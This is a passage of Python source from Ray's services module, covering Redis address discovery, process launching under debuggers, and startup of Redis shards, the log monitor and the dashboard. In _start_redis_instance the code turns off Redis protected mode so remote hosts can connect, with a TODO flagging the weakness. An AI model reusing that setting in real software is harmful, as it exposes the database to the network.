Returns: Set of detected Redis instances. """ # Currently, this extracts the deprecated --redis-address from the command # that launched the raylet running on this node, if any. Anyone looking to # edit this function should be warned that these commands look like, for # example: # /usr/local/lib/python3.8/dist-packages/ray/core/src/ray/raylet/raylet # --redis_address=123.456.78.910 --node_ip_address=123.456.78.910 # --raylet_socket_name=... --store_socket_name=... --object_manager_port=0 # --min_worker_port=10000 --max_worker_port=10999 # --node_manager_port=58578 --redis_port=6379 # --maximum_startup_concurrency=8 # --static_resource_list=node:123.456.78.910,1.0,object_store_memory,66 # --config_list=plasma_store_as_thread,True # --python_worker_command=/usr/bin/python # /usr/local/lib/python3.8/dist-packages/ray/workers/default_worker.py # --redis-address=123.456.78.910:6379 # --node-ip-address=123.456.78.910 --node-manager-port=58578 # --object-store-name=... --raylet-name=... # --temp-dir=/tmp/ray # --metrics-agent-port=41856 --redis-password=[MASKED] # --java_worker_command= --cpp_worker_command= # --redis_password=[MASKED] --temp_dir=/tmp/ray --session_dir=... # --metrics-agent-port=41856 --metrics_export_port=64229 # --agent_command=/usr/bin/python # -u /usr/local/lib/python3.8/dist-packages/ray/new_dashboard/agent.py # --redis-address=123.456.78.910:6379 --metrics-export-port=64229 # --dashboard-agent-port=41856 --node-manager-port=58578 # --object-store-name=... --raylet-name=... --temp-dir=/tmp/ray # --log-dir=/tmp/ray/session_2020-11-08_14-29-07_199128_278000/logs # --redis-password=[MASKED] --object_store_memory=5037192806 # --plasma_directory=/tmp # Longer arguments are elided with ... but all arguments from this instance # are included, to provide a sense of what is in these. # Indeed, we had to pull --redis-address to the front of each call to make # this readable. # As you can see, this is very long and complex, which is why we can't # simply extract all the the arguments using regular expressions and # present a dict as if we never lost track of these arguments, for # example. Picking out --redis-address below looks like it might grab the # wrong thing, but double-checking that we're finding the correct process # by checking that the contents look like we expect would probably be prone # to choking in unexpected ways. # Notice that --redis-address appears twice. This is not a copy-paste # error; this is the reason why the for loop below attempts to pick out # every appearance of --redis-address. # The --redis-address here is what is now called the --address, but it # appears in the default_worker.py and agent.py calls as --redis-address. pids = psutil.pids() redis_addresses = set() for pid in pids: try: proc = psutil.Process(pid) # HACK: Workaround for UNIX idiosyncrasy # Normally, cmdline() is supposed to return the argument list. # But it in some cases (such as when setproctitle is called), # an arbitrary string resembling a command-line is stored in # the first argument. # Explanation: https://unix.stackexchange.com/a/432681 # More info: https://github.com/giampaolo/psutil/issues/1179 cmdline = proc.cmdline() # NOTE(kfstorm): To support Windows, we can't use # `os.path.basename(cmdline[0]) == "raylet"` here. if len(cmdline) > 0 and "raylet" in os.path.basename(cmdline[0]): for arglist in cmdline: # Given we're merely seeking --redis-address, we just split # every argument on spaces for now. 
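# (Editor's note, illustrative only:) a matching entry in the raylet
# cmdline looks like "--redis-address=123.456.78.910:6379"; splitting on
# "=" below yields the "<host>:<port>" part that callers expect.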
for arg in arglist.split(" "): # TODO(ekl): Find a robust solution for locating Redis. if arg.startswith("--redis-address="): proc_addr = arg.split("=")[1] if address is not None and address != proc_addr: continue redis_addresses.add(proc_addr) except psutil.AccessDenied: pass except psutil.NoSuchProcess: pass return redis_addresses def get_ray_address_to_use_or_die(): """ Attempts to find an address for an existing Ray cluster if it is not already specified as an environment variable. Returns: A string to pass into `ray.init(address=...)` """ return os.environ.get(ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE, find_redis_address_or_die()) def find_redis_address_or_die(): redis_addresses = find_redis_address() if len(redis_addresses) > 1: raise ConnectionError( f"Found multiple active Ray instances: {redis_addresses}. " "Please specify the one to connect to by setting `address`.") sys.exit(1) elif not redis_addresses: raise ConnectionError( "Could not find any running Ray instance. " "Please specify the one to connect to by setting `address`.") return redis_addresses.pop() def wait_for_node(redis_address, node_plasma_store_socket_name, redis_password=None, timeout=30): """Wait until this node has appeared in the client table. Args: redis_address (str): The redis address. node_plasma_store_socket_name (str): The plasma_store_socket_name for the given node which we wait for. redis_password (str): the redis password. timeout: The amount of time in seconds to wait before raising an exception. Raises: TimeoutError: An exception is raised if the timeout expires before the node appears in the client table. """ redis_ip_address, redis_port = redis_address.split(":") wait_for_redis_to_start(redis_ip_address, redis_port, redis_password) global_state = ray.state.GlobalState() global_state._initialize_global_state(redis_address, redis_password) start_time = time.time() while time.time() - start_time < timeout: clients = global_state.node_table() object_store_socket_names = [ client["ObjectStoreSocketName"] for client in clients ] if node_plasma_store_socket_name in object_store_socket_names: return else: time.sleep(0.1) raise TimeoutError("Timed out while waiting for node to startup.") def get_node_to_connect_for_driver(redis_address, node_ip_address, redis_password=None): redis_ip_address, redis_port = redis_address.split(":") # Get node table from global state accessor. global_state = ray.state.GlobalState() global_state._initialize_global_state(redis_address, redis_password) return global_state.get_node_to_connect_for_driver(node_ip_address) def get_webui_url_from_redis(redis_client): webui_url = redis_client.hmget("webui", "url")[0] return ray._private.utils.decode( webui_url) if webui_url is not None else None def remaining_processes_alive(): """See if the remaining processes are alive or not. Note that this ignores processes that have been explicitly killed, e.g., via a command like node.kill_raylet(). Returns: True if the remaining processes started by ray.init() are alive and False otherwise. Raises: Exception: An exception is raised if the processes were not started by ray.init(). """ if ray.worker._global_node is None: raise RuntimeError("This process is not in a position to determine " "whether all processes are alive or not.") return ray.worker._global_node.remaining_processes_alive() def validate_redis_address(address): """Validates address parameter. Returns: redis_address: string containing the full <host:port> address. redis_ip: string representing the host portion of the address. 
redis_port: integer representing the port portion of the address. """ if address == "auto": address = find_redis_address_or_die() redis_address = address_to_ip(address) redis_address_parts = redis_address.split(":") if len(redis_address_parts) != 2: raise ValueError("Malformed address. Expected '<host>:<port>'.") redis_ip = redis_address_parts[0] try: redis_port = int(redis_address_parts[1]) except ValueError: raise ValueError("Malformed address port. Must be an integer.") if redis_port < 1024 or redis_port > 65535: raise ValueError("Invalid address port. Must " "be between 1024 and 65535.") return redis_address, redis_ip, redis_port def address_to_ip(address): """Convert a hostname to a numerical IP addresses in an address. This should be a no-op if address already contains an actual numerical IP address. Args: address: This can be either a string containing a hostname (or an IP address) and a port or it can be just an IP address. Returns: The same address but with the hostname replaced by a numerical IP address. """ address_parts = address.split(":") ip_address = socket.gethostbyname(address_parts[0]) # Make sure localhost isn't resolved to the loopback ip if ip_address == "127.0.0.1": ip_address = get_node_ip_address() return ":".join([ip_address] + address_parts[1:]) def node_ip_address_from_perspective(address): """IP address by which the local node can be reached *from* the `address`. Args: address (str): The IP address and port of any known live service on the network you care about. Returns: The IP address by which the local node can be reached from the address. """ ip_address, port = address.split(":") s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # This command will raise an exception if there is no internet # connection. s.connect((ip_address, int(port))) node_ip_address = s.getsockname()[0] except OSError as e: node_ip_address = "127.0.0.1" # [Errno 101] Network is unreachable if e.errno == errno.ENETUNREACH: try: # try get node ip address from host name host_name = socket.getfqdn(socket.gethostname()) node_ip_address = socket.gethostbyname(host_name) except Exception: pass finally: s.close() return node_ip_address def get_node_ip_address(address="8.8.8.8:53"): if ray.worker._global_node is not None: return ray.worker._global_node.node_ip_address return node_ip_address_from_perspective(address) def create_redis_client(redis_address, password=None): """Create a Redis client. Args: The IP address, port, and password of the Redis server. Returns: A Redis client. """ redis_ip_address, redis_port = redis_address.split(":") # For this command to work, some other client (on the same machine # as Redis) must have run "CONFIG SET protected-mode no". return redis.StrictRedis( host=redis_ip_address, port=int(redis_port), password=password) def start_ray_process(command, process_type, fate_share, env_updates=None, cwd=None, use_valgrind=False, use_gdb=False, use_valgrind_profiler=False, use_perftools_profiler=False, use_tmux=False, stdout_file=None, stderr_file=None, pipe_stdin=False): """Start one of the Ray processes. TODO(rkn): We need to figure out how these commands interact. For example, it may only make sense to start a process in gdb if we also start it in tmux. Similarly, certain combinations probably don't make sense, like simultaneously running the process in valgrind and the profiler. Args: command (List[str]): The command to use to start the Ray process. process_type (str): The type of the process that is being started (e.g., "raylet"). 
fate_share: If true, the child will be killed if its parent (us) dies. True must only be passed after detection of this functionality. env_updates (dict): A dictionary of additional environment variables to run the command with (in addition to the caller's environment variables). cwd (str): The directory to run the process in. use_valgrind (bool): True if we should start the process in valgrind. use_gdb (bool): True if we should start the process in gdb. use_valgrind_profiler (bool): True if we should start the process in the valgrind profiler. use_perftools_profiler (bool): True if we should profile the process using perftools. use_tmux (bool): True if we should start the process in tmux. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. pipe_stdin: If true, subprocess.PIPE will be passed to the process as stdin. Returns: Information about the process that was started including a handle to the process that was started. """ # Detect which flags are set through environment variables. valgrind_env_var = f"RAY_{process_type.upper()}_VALGRIND" if os.environ.get(valgrind_env_var) == "1": logger.info("Detected environment variable '%s'.", valgrind_env_var) use_valgrind = True valgrind_profiler_env_var = f"RAY_{process_type.upper()}_VALGRIND_PROFILER" if os.environ.get(valgrind_profiler_env_var) == "1": logger.info("Detected environment variable '%s'.", valgrind_profiler_env_var) use_valgrind_profiler = True perftools_profiler_env_var = (f"RAY_{process_type.upper()}" "_PERFTOOLS_PROFILER") if os.environ.get(perftools_profiler_env_var) == "1": logger.info("Detected environment variable '%s'.", perftools_profiler_env_var) use_perftools_profiler = True tmux_env_var = f"RAY_{process_type.upper()}_TMUX" if os.environ.get(tmux_env_var) == "1": logger.info("Detected environment variable '%s'.", tmux_env_var) use_tmux = True gdb_env_var = f"RAY_{process_type.upper()}_GDB" if os.environ.get(gdb_env_var) == "1": logger.info("Detected environment variable '%s'.", gdb_env_var) use_gdb = True if sum([ use_gdb, use_valgrind, use_valgrind_profiler, use_perftools_profiler, ]) > 1: raise ValueError( "At most one of the 'use_gdb', 'use_valgrind', " "'use_valgrind_profiler', and 'use_perftools_profiler' flags can " "be used at a time.") if env_updates is None: env_updates = {} if not isinstance(env_updates, dict): raise ValueError("The 'env_updates' argument must be a dictionary.") modified_env = os.environ.copy() modified_env.update(env_updates) if use_gdb: if not use_tmux: raise ValueError( "If 'use_gdb' is true, then 'use_tmux' must be true as well.") # TODO(suquark): Any better temp file creation here? 
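# (Editor's note:) the file written below is a one-line gdb script of the
# form "run '<arg1>' '<arg2>' ...", and the process is then launched as
# "gdb <executable> -x <init file>" so that gdb starts it with the
# original arguments already applied.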
gdb_init_path = os.path.join(ray._private.utils.get_ray_temp_dir(), f"gdb_init_{process_type}_{time.time()}") ray_process_path = command[0] ray_process_args = command[1:] run_args = " ".join(["'{}'".format(arg) for arg in ray_process_args]) with open(gdb_init_path, "w") as gdb_init_file: gdb_init_file.write(f"run {run_args}") command = ["gdb", ray_process_path, "-x", gdb_init_path] if use_valgrind: command = [ "valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--leak-check-heuristics=stdstring", "--error-exitcode=1", ] + command if use_valgrind_profiler: command = ["valgrind", "--tool=callgrind"] + command if use_perftools_profiler: modified_env["LD_PRELOAD"] = os.environ["PERFTOOLS_PATH"] modified_env["CPUPROFILE"] = os.environ["PERFTOOLS_LOGFILE"] if use_tmux: # The command has to be created exactly as below to ensure that it # works on all versions of tmux. (Tested with tmux 1.8-5, travis' # version, and tmux 2.1) command = ["tmux", "new-session", "-d", f"{" ".join(command)}"] if fate_share: assert ray._private.utils.detect_fate_sharing_support(), ( "kernel-level fate-sharing must only be specified if " "detect_fate_sharing_support() has returned True") def preexec_fn(): import signal signal.pthread_sigmask(signal.SIG_BLOCK, {signal.SIGINT}) if fate_share and sys.platform.startswith("linux"): ray._private.utils.set_kill_on_parent_death_linux() win32_fate_sharing = fate_share and sys.platform == "win32" # With Windows fate-sharing, we need special care: # The process must be added to the job before it is allowed to execute. # Otherwise, there's a race condition: the process might spawn children # before the process itself is assigned to the job. # After that point, its children will not be added to the job anymore. CREATE_SUSPENDED = 0x00000004 # from Windows headers process = ConsolePopen( command, env=modified_env, cwd=cwd, stdout=stdout_file, stderr=stderr_file, stdin=subprocess.PIPE if pipe_stdin else None, preexec_fn=preexec_fn if sys.platform != "win32" else None, creationflags=CREATE_SUSPENDED if win32_fate_sharing else 0) if win32_fate_sharing: try: ray._private.utils.set_kill_child_on_death_win32(process) psutil.Process(process.pid).resume() except (psutil.Error, OSError): process.kill() raise def _get_stream_name(stream): if stream is not None: try: return stream.name except AttributeError: return str(stream) return None return ProcessInfo( process=process, stdout_file=_get_stream_name(stdout_file), stderr_file=_get_stream_name(stderr_file), use_valgrind=use_valgrind, use_gdb=use_gdb, use_valgrind_profiler=use_valgrind_profiler, use_perftools_profiler=use_perftools_profiler, use_tmux=use_tmux) def wait_for_redis_to_start(redis_ip_address, redis_port, password=None): """Wait for a Redis server to be available. This is accomplished by creating a Redis client and sending a random command to the server until the command gets through. Args: redis_ip_address (str): The IP address of the redis server. redis_port (int): The port of the redis server. password (str): The password of the redis server. Raises: Exception: An exception is raised if we could not connect with Redis. """ redis_client = redis.StrictRedis( host=redis_ip_address, port=redis_port, password=password) # Wait for the Redis server to start. num_retries = ray_constants.START_REDIS_WAIT_RETRIES delay = 0.001 for i in range(num_retries): try: # Run some random command and see if it worked. 
logger.debug( "Waiting for redis server at {}:{} to respond...".format( redis_ip_address, redis_port)) redis_client.client_list() # If the Redis service is delayed getting set up for any reason, we may # get a redis.ConnectionError: Error 111 connecting to host:port. # Connection refused. # Unfortunately, redis.ConnectionError is also the base class of # redis.AuthenticationError. We *don't* want to obscure a # redis.AuthenticationError, because that indicates the user provided a # bad password. Thus a double except clause to ensure a # redis.AuthenticationError isn't trapped here. except redis.AuthenticationError as authEx: raise RuntimeError("Unable to connect to Redis at {}:{}.".format( redis_ip_address, redis_port)) from authEx except redis.ConnectionError as connEx: if i >= num_retries - 1: raise RuntimeError( f"Unable to connect to Redis at {redis_ip_address}:" f"{redis_port} after {num_retries} retries. Check that " f"{redis_ip_address}:{redis_port} is reachable from this " "machine. If it is not, your firewall may be blocking " "this port. If the problem is a flaky connection, try " "setting the environment variable " "`RAY_START_REDIS_WAIT_RETRIES` to increase the number of" " attempts to ping the Redis server.") from connEx # Wait a little bit. time.sleep(delay) delay *= 2 else: break else: raise RuntimeError( f"Unable to connect to Redis (after {num_retries} retries). " "If the Redis instance is on a different machine, check that " "your firewall and relevant Ray ports are configured properly. " "You can also set the environment variable " "`RAY_START_REDIS_WAIT_RETRIES` to increase the number of " "attempts to ping the Redis server.") def _compute_version_info(): """Compute the versions of Python, and Ray. Returns: A tuple containing the version information. """ ray_version = ray.__version__ python_version = ".".join(map(str, sys.version_info[:3])) return ray_version, python_version def _put_version_info_in_redis(redis_client): """Store version information in Redis. This will be used to detect if workers or drivers are started using different versions of Python, or Ray. Args: redis_client: A client for the primary Redis shard. """ redis_client.set("VERSION_INFO", json.dumps(_compute_version_info())) def check_version_info(redis_client): """Check if various version info of this process is correct. This will be used to detect if workers or drivers are started using different versions of Python, or Ray. If the version information is not present in Redis, then no check is done. Args: redis_client: A client for the primary Redis shard. Raises: Exception: An exception is raised if there is a version mismatch. """ redis_reply = redis_client.get("VERSION_INFO") # Don't do the check if there is no version information in Redis. This # is to make it easier to do things like start the processes by hand. 
if redis_reply is None: return true_version_info = tuple( json.loads(ray._private.utils.decode(redis_reply))) version_info = _compute_version_info() if version_info != true_version_info: node_ip_address = get_node_ip_address() error_message = ("Version mismatch: The cluster was started with:\n" " Ray: " + true_version_info[0] + "\n" " Python: " + true_version_info[1] + "\n" "This process on node " + node_ip_address + " was started with:" + "\n" " Ray: " + version_info[0] + "\n" " Python: " + version_info[1] + "\n") if version_info[:2] != true_version_info[:2]: raise RuntimeError(error_message) else: logger.warning(error_message) def start_reaper(fate_share=None): """Start the reaper process. This is a lightweight process that simply waits for its parent process to die and then terminates its own process group. This allows us to ensure that ray processes are always terminated properly so long as that process itself isn't SIGKILLed. Returns: ProcessInfo for the process that was started. """ # Make ourselves a process group leader so that the reaper can clean # up other ray processes without killing the process group of the # process that started us. try: if sys.platform != "win32": os.setpgrp() except OSError as e: errcode = e.errno if errcode == errno.EPERM and os.getpgrp() == os.getpid(): # Nothing to do; we're already a session leader. pass else: logger.warning("setpgrp failed, processes may not be " "cleaned up properly: {}.".format(e)) # Don't start the reaper in this case as it could result in killing # other user processes. return None reaper_filepath = os.path.join(RAY_PATH, RAY_PRIVATE_DIR, "ray_process_reaper.py") command = [sys.executable, "-u", reaper_filepath] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_REAPER, pipe_stdin=True, fate_share=fate_share) return process_info def start_redis(node_ip_address, redirect_files, resource_spec, port=None, redis_shard_ports=None, num_redis_shards=1, redis_max_clients=None, redirect_worker_output=False, password=None, fate_share=None, external_addresses=None, port_denylist=None): """Start the Redis global state store. Args: node_ip_address: The IP address of the current node. This is only used for recording the log filenames in Redis. redirect_files: The list of (stdout, stderr) file pairs. resource_spec (ResourceSpec): Resources for the node. port (int): If provided, the primary Redis shard will be started on this port. redis_shard_ports: A list of the ports to use for the non-primary Redis shards. num_redis_shards (int): If provided, the number of Redis shards to start, in addition to the primary one. The default value is one shard. redis_max_clients: If this is provided, Ray will attempt to configure Redis with this maxclients number. redirect_worker_output (bool): True if worker output should be redirected to a file and false otherwise. Workers will have access to this value when they start up. password (str): Prevents external clients without the password from connecting to Redis if provided. port_denylist (set): A set of denylist ports that shouldn't be used when allocating a new port. Returns: A tuple of the address for the primary Redis shard, a list of addresses for the remaining shards, and the processes that were started. 
""" if len(redirect_files) != 1 + num_redis_shards: raise ValueError("The number of redirect file pairs should be equal " "to the number of redis shards (including the " "primary shard) we will start.") if redis_shard_ports is None: redis_shard_ports = num_redis_shards * [None] elif len(redis_shard_ports) != num_redis_shards: raise RuntimeError("The number of Redis shard ports does not match " "the number of Redis shards.") processes = [] if external_addresses is not None: primary_redis_address = external_addresses[0] [primary_redis_ip, port] = primary_redis_address.split(":") port = int(port) redis_address = address(primary_redis_ip, port) primary_redis_client = create_redis_client( "%s:%s" % (primary_redis_ip, port), password=password) # Deleting the key to avoid duplicated rpush. primary_redis_client.delete("RedisShards") else: redis_executable = REDIS_EXECUTABLE redis_modules = [REDIS_MODULE] redis_stdout_file, redis_stderr_file = redirect_files[0] # If no port is given, fallback to default Redis port for the primary # shard. if port is None: port = ray_constants.DEFAULT_PORT num_retries = 20 else: num_retries = 1 # Start the primary Redis shard. port, p = _start_redis_instance( redis_executable, modules=redis_modules, port=port, password=password, redis_max_clients=redis_max_clients, num_retries=num_retries, # Below we use None to indicate no limit on the memory of the # primary Redis shard. redis_max_memory=None, stdout_file=redis_stdout_file, stderr_file=redis_stderr_file, fate_share=fate_share, port_denylist=port_denylist) processes.append(p) redis_address = address(node_ip_address, port) primary_redis_client = redis.StrictRedis( host=node_ip_address, port=port, password=password) # Register the number of Redis shards in the primary shard, so that clients # know how many redis shards to expect under RedisShards. primary_redis_client.set("NumRedisShards", str(num_redis_shards)) # Put the redirect_worker_output bool in the Redis shard so that workers # can access it and know whether or not to redirect their output. primary_redis_client.set("RedirectOutput", 1 if redirect_worker_output else 0) # Init job counter to GCS. primary_redis_client.set("JobCounter", 0) # Store version information in the primary Redis shard. _put_version_info_in_redis(primary_redis_client) # Calculate the redis memory. assert resource_spec.resolved() redis_max_memory = resource_spec.redis_max_memory # Start other Redis shards. Each Redis shard logs to a separate file, # prefixed by "redis-<shard number>". redis_shards = [] # If Redis shard ports are not provided, start the port range of the # other Redis shards at a high, random port. last_shard_port = new_port(denylist=port_denylist) - 1 for i in range(num_redis_shards): if external_addresses is not None and len(external_addresses) > 1: shard_address = external_addresses[i + 1] else: redis_stdout_file, redis_stderr_file = redirect_files[i + 1] redis_executable = REDIS_EXECUTABLE redis_modules = [REDIS_MODULE] redis_shard_port = redis_shard_ports[i] # If no shard port is given, try to start this shard's Redis # instance on the port right after the last shard's port. 
            if redis_shard_port is None:
                redis_shard_port = last_shard_port + 1
                num_retries = 20
            else:
                num_retries = 1

            redis_shard_port, p = _start_redis_instance(
                redis_executable,
                modules=redis_modules,
                port=redis_shard_port,
                password=password,
                redis_max_clients=redis_max_clients,
                num_retries=num_retries,
                redis_max_memory=redis_max_memory,
                stdout_file=redis_stdout_file,
                stderr_file=redis_stderr_file,
                fate_share=fate_share,
                port_denylist=port_denylist)
            processes.append(p)
            shard_address = address(node_ip_address, redis_shard_port)
            last_shard_port = redis_shard_port

        redis_shards.append(shard_address)
        # Store redis shard information in the primary redis shard.
        primary_redis_client.rpush("RedisShards", shard_address)

    return redis_address, redis_shards, processes


def _start_redis_instance(executable,
                          modules,
                          port,
                          redis_max_clients=None,
                          num_retries=20,
                          stdout_file=None,
                          stderr_file=None,
                          password=None,
                          redis_max_memory=None,
                          fate_share=None,
                          port_denylist=None):
    """Start a single Redis server.

    Notes:
        We will initially try to start the Redis instance at the given port,
        and then try at most `num_retries - 1` times to start the Redis
        instance at successive random ports.

    Args:
        executable (str): Full path of the redis-server executable.
        modules (list of str): A list of pathnames, pointing to the redis
            module(s) that will be loaded in this redis server.
        port (int): Try to start a Redis server at this port.
        redis_max_clients: If this is provided, Ray will attempt to configure
            Redis with this maxclients number.
        num_retries (int): The number of times to attempt to start Redis at
            successive ports.
        stdout_file: A file handle opened for writing to redirect stdout to.
            If no redirection should happen, then this should be None.
        stderr_file: A file handle opened for writing to redirect stderr to.
            If no redirection should happen, then this should be None.
        password (str): Prevents external clients without the password
            from connecting to Redis if provided.
        redis_max_memory: The max amount of memory (in bytes) to allow redis
            to use, or None for no limit. Once the limit is exceeded, redis
            will start LRU eviction of entries.
        port_denylist (set): A set of denylist ports that shouldn't
            be used when allocating a new port.

    Returns:
        A tuple of the port used by Redis and ProcessInfo for the process that
            was started. If a port is passed in, then the returned port value
            is the same.

    Raises:
        Exception: An exception is raised if Redis could not be started.
    """
    assert os.path.isfile(executable)
    for module in modules:
        assert os.path.isfile(module)
    counter = 0

    load_module_args = []
    for module in modules:
        load_module_args += ["--loadmodule", module]

    while counter < num_retries:
        # Construct the command to start the Redis server.
        command = [executable]
        if password:
            if " " in password:
                raise ValueError("Spaces not permitted in redis password.")
            command += ["--requirepass", password]
        command += (["--port", str(port), "--loglevel", "warning"] +
                    load_module_args)
        process_info = start_ray_process(
            command,
            ray_constants.PROCESS_TYPE_REDIS_SERVER,
            stdout_file=stdout_file,
            stderr_file=stderr_file,
            fate_share=fate_share)
        time.sleep(0.1)
        # Check if Redis successfully started (or at least if the executable
        # did not exit within 0.1 seconds).
        if process_info.process.poll() is None:
            break
        port = new_port(denylist=port_denylist)
        counter += 1
    if counter == num_retries:
        raise RuntimeError("Couldn't start Redis. "
                           "Check log files: {} {}".format(
                               stdout_file.name
                               if stdout_file is not None else "<stdout>",
                               stderr_file.name
                               if stderr_file is not None else "<stderr>"))

    # Create a Redis client just for configuring Redis.
    redis_client = redis.StrictRedis(
        host="127.0.0.1", port=port, password=password)
    # Wait for the Redis server to start.
    wait_for_redis_to_start("127.0.0.1", port, password=password)
    # Configure Redis to generate keyspace notifications. TODO(rkn): Change
    # this to only generate notifications for the export keys.
    redis_client.config_set("notify-keyspace-events", "Kl")

    # Configure Redis to not run in protected mode so that processes on other
    # hosts can connect to it. TODO(rkn): Do this in a more secure way.
    redis_client.config_set("protected-mode", "no")

    # Discard old task and object metadata.
    if redis_max_memory is not None:
        redis_client.config_set("maxmemory", str(redis_max_memory))
        redis_client.config_set("maxmemory-policy", "allkeys-lru")
        redis_client.config_set("maxmemory-samples", "10")
        logger.debug("Starting Redis shard with {} GB max memory.".format(
            round(redis_max_memory / 1e9, 2)))

    # If redis_max_clients is provided, attempt to raise the maximum number
    # of Redis clients.
    if redis_max_clients is not None:
        redis_client.config_set("maxclients", str(redis_max_clients))
    elif resource is not None:
        # If redis_max_clients is not provided, determine the current ulimit.
        # We will use this to attempt to raise the maximum number of Redis
        # clients.
        current_max_clients = int(
            redis_client.config_get("maxclients")["maxclients"])
        # The below command should be the same as doing ulimit -n.
        ulimit_n = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
        # The quantity redis_client_buffer appears to be the required buffer
        # between the maximum number of redis clients and ulimit -n. That is,
        # if ulimit -n returns 10000, then we can set maxclients to
        # 10000 - redis_client_buffer.
        redis_client_buffer = 32
        if current_max_clients < ulimit_n - redis_client_buffer:
            redis_client.config_set("maxclients",
                                    ulimit_n - redis_client_buffer)

    # Increase the hard and soft limits for the redis client pubsub buffer to
    # 128MB. This is a hack to make it less likely for pubsub messages to be
    # dropped and for pubsub connections to therefore be killed.
    cur_config = (redis_client.config_get("client-output-buffer-limit")[
        "client-output-buffer-limit"])
    cur_config_list = cur_config.split()
    assert len(cur_config_list) == 12
    cur_config_list[8:] = ["pubsub", "134217728", "134217728", "60"]
    redis_client.config_set("client-output-buffer-limit",
                            " ".join(cur_config_list))
    # Put a time stamp in Redis to indicate when it was started.
    redis_client.set("redis_start_time", time.time())
    return port, process_info


def start_log_monitor(redis_address,
                      logs_dir,
                      stdout_file=None,
                      stderr_file=None,
                      redis_password=None,
                      fate_share=None,
                      max_bytes=0,
                      backup_count=0):
    """Start a log monitor process.

    Args:
        redis_address (str): The address of the Redis instance.
        logs_dir (str): The directory of logging files.
        stdout_file: A file handle opened for writing to redirect stdout to.
            If no redirection should happen, then this should be None.
        stderr_file: A file handle opened for writing to redirect stderr to.
            If no redirection should happen, then this should be None.
        redis_password (str): The password of the redis server.
        max_bytes (int): Log rotation parameter. Corresponding to
            RotatingFileHandler's maxBytes.
        backup_count (int): Log rotation parameter. Corresponding to
            RotatingFileHandler's backupCount.
Returns: ProcessInfo for the process that was started. """ log_monitor_filepath = os.path.join(RAY_PATH, RAY_PRIVATE_DIR, "log_monitor.py") command = [ sys.executable, "-u", log_monitor_filepath, f"--redis-address={redis_address}", f"--logs-dir={logs_dir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if redis_password: command += ["--redis-password", redis_password] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_LOG_MONITOR, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_dashboard(require_dashboard, host, redis_address, temp_dir, logdir, port=None, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0): """Start a dashboard process. Args: require_dashboard (bool): If true, this will raise an exception if we fail to start the dashboard. Otherwise it will print a warning if we fail to start the dashboard. host (str): The host to bind the dashboard web server to. port (str): The port to bind the dashboard web server to. Defaults to 8265. redis_address (str): The address of the Redis instance. temp_dir (str): The temporary directory used for log files and information for this Ray session. logdir (str): The log directory used to generate dashboard log. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ try: # Make sure port is available. if port is None: port_retries = 50 port = ray_constants.DEFAULT_DASHBOARD_PORT else: port_retries = 0 port_test_socket = socket.socket() port_test_socket.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1, ) try: port_test_socket.bind((host, port)) port_test_socket.close() except socket.error as e: if e.errno in {48, 98}: # address already in use. raise ValueError( f"Failed to bind to {host}:{port} because it's " "already occupied. You can use `ray start " "--dashboard-port ...` or `ray.init(dashboard_port=..." ")` to select a different port.") else: raise e # Make sure the process can start. try: import aiohttp # noqa: F401 import aioredis # noqa: F401 import aiohttp_cors # noqa: F401 import grpc # noqa: F401 except ImportError: warning_message = ( "Not all Ray Dashboard dependencies were found. " "In Ray 1.4+, the Ray CLI, autoscaler, and dashboard will " "only be usable via `pip install 'ray[default]'`. Please " "update your install command.") raise ImportError(warning_message) # Start the dashboard process. 
dashboard_dir = "new_dashboard" dashboard_filepath = os.path.join(RAY_PATH, dashboard_dir, "dashboard.py") command = [ sys.executable, "-u", dashboard_filepath, f"--host={host}", f"--port={port}", f"--port-retries={port_retries}", f"--redis-address={redis_address}", f"--temp-dir={temp_dir}", f"--log-dir={logdir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if redis_password: command += ["--redis-password", redis_password] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_DASHBOARD, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) # Retrieve the dashboard url redis_client = ray._private.services.create_redis_client( redis_address, redis_password) dashboard_url = None dashboard_returncode = None for _ in range(200): dashboard_url = redis_client.get(ray_constants.REDIS_KEY_DASHBOARD) if dashboard_url is not None: dashboard_url = dashboard_url.decode("utf-8") break dashboard_returncode = process_info.process.poll() if dashboard_returncode is not None: break # This is often on the critical path of ray.init() and ray start, # so we need to poll often. time.sleep(0.1) if dashboard_url is None: dashboard_log = os.path.join(logdir, "dashboard.log") returncode_str = (f", return code {dashboard_returncode}" if dashboard_returncode is not None else "") # Read last n lines of dashboard log. The log file may be large. n = 10 lines = [] try: with open(dashboard_log, "rb") as f: with mmap.mmap( f.fileno(), 0, access=mmap.ACCESS_READ) as mm: end = mm.size() for _ in range(n): sep = mm.rfind(b"\n", 0, end - 1) if sep == -1: break lines.append(mm[sep + 1:end].decode("utf-8")) end = sep lines.append(f" The last {n} lines of {dashboard_log}:") except Exception as e: raise Exception(f"Failed to read dashbord log: {e}") last_log_str = "\n".join(reversed(lines[-n:])) raise Exception("Failed to start the dashboard" f"{returncode_str}.{last_log_str}") logger.info("View the Ray dashboard at %s%shttp://%s%s%s", colorama.Style.BRIGHT, colorama.Fore.GREEN, dashboard_url, colorama.Fore.RESET, colorama.Style.NORMAL) return dashboard_url, process_info except Exception as e: if require_dashboard: raise e from e else: logger.error(f"Failed to start the dashboard: {e}") return None, None def start_gcs_server(redis_address, stdout_file=None, stderr_file=None, redis_password=None, config=None, 